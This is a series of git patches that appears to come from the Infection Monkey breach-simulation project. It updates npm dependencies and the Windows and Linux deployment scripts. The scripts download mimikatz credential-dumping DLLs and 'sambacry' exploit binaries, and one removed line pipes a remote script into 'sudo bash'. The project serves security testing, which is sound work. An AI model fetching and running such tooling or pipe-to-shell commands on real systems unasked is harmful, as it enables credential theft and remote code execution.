"sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { @@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { @@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } @@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" @@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, @@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", @@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", From 97542107dc657dd312d9da472c71e2b99208661c Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 11/44] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } From dff71eabc4fedb5b8a3b09c17e691cd43da4dae8 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 12/44] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/monkey.spec | 1 + 3 files changed, 25 insertions(+) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 6245be15ebc0ea280e1dfa9b970b2a63788fd681 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 13/44] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." From eaee0451c50d802f73c370e519d45c31501c5cb1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 14/44] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config @@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" +# Other binaries for monkey +TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64" +TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32" +SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so" +SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so" + # Mongo url's MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 4df8ba114..136e3f8b1 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" @@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" @@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl @@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt +++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 49c1e37a5..c6088a3ea 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From 05af080f98e24dbb1bc23667e6523fede2822a84 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 17 Oct 2019 18:06:01 +0300 Subject: [PATCH 15/44] Linux deployment fixes --- deployment_scripts/deploy_linux.sh | 4 ++++ monkey/infection_monkey/exploit/sshexec.py | 1 - monkey/monkey_island/linux/run.sh | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 136e3f8b1..f3cc4001c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -70,6 +70,7 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt update sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" @@ -82,6 +83,9 @@ log_message "Installing pip" sudo apt install python3-pip ${python_cmd} -m pip install pip +log_message "Install python3.7-dev" +sudo apt-get install python3.7-dev + log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index f7abd3ce0..9765f018c 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -5,7 +5,6 @@ import time import paramiko import infection_monkey.monkeyfs as monkeyfs -from common.utils.exploit_enum import ExploitType from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_interface_to_target diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 235b30469..26d8c3234 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -13,4 +13,4 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then fi ./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py \ No newline at end of file +${python_cmd} monkey_island.py From e52491aef5ca32cc66c131fa37a589540953b65e Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 10:17:47 +0300 Subject: [PATCH 16/44] Small linux deployment script improvement --- deployment_scripts/deploy_linux.sh | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index f3cc4001c..70ca2e5e3 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -90,6 +90,11 @@ log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error +log_message "Installing monkey requirements" +sudo apt-get install libffi-dev upx libssl-dev libc++1 +cd ${monkey_home}/monkey/infection_monkey || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + # Download binaries log_message "Downloading binaries" wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL} @@ -137,12 +142,6 @@ log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist -# Monkey setup -log_message "Installing monkey requirements" -sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 -cd ${monkey_home}/monkey/infection_monkey || handle_error -${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error - # Making dir for binaries mkdir ${MONKEY_BIN_DIR} From fbe9708da654a6190438af7a83bb351cc870129d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 14:46:59 +0300 Subject: [PATCH 17/44] Removed ppa, unused certificate generation, updated readme --- deployment_scripts/README.md | 2 +- deployment_scripts/deploy_linux.sh | 14 +++----------- monkey/monkey_island/linux/run.sh | 4 ++-- monkey/monkey_island/readme.txt | 10 +++++----- 4 files changed, 11 insertions(+), 19 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 10027edce..0faf95a52 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -16,7 +16,7 @@ Don't forget to add python to PATH or do so while installing it via this script. You must have root permissions, but don't run the script as root.
Launch deploy_linux.sh from scripts directory.
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions, for e.g. /home/your_username +Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 70ca2e5e3..5e191d5fe 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,9 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo add-apt-repository ppa:deadsnakes/ppa - sudo apt update - sudo apt install python3.7 + sudo apt-get update + sudo apt-get install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi @@ -119,13 +118,6 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -cd ${ISLAND_PATH} || handle_error -openssl genrsa -out cc/server.key 1024 || handle_error -openssl req -new -key cc/server.key -out cc/server.csr \ --subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error -openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error - - sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error @@ -151,7 +143,7 @@ wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} wget 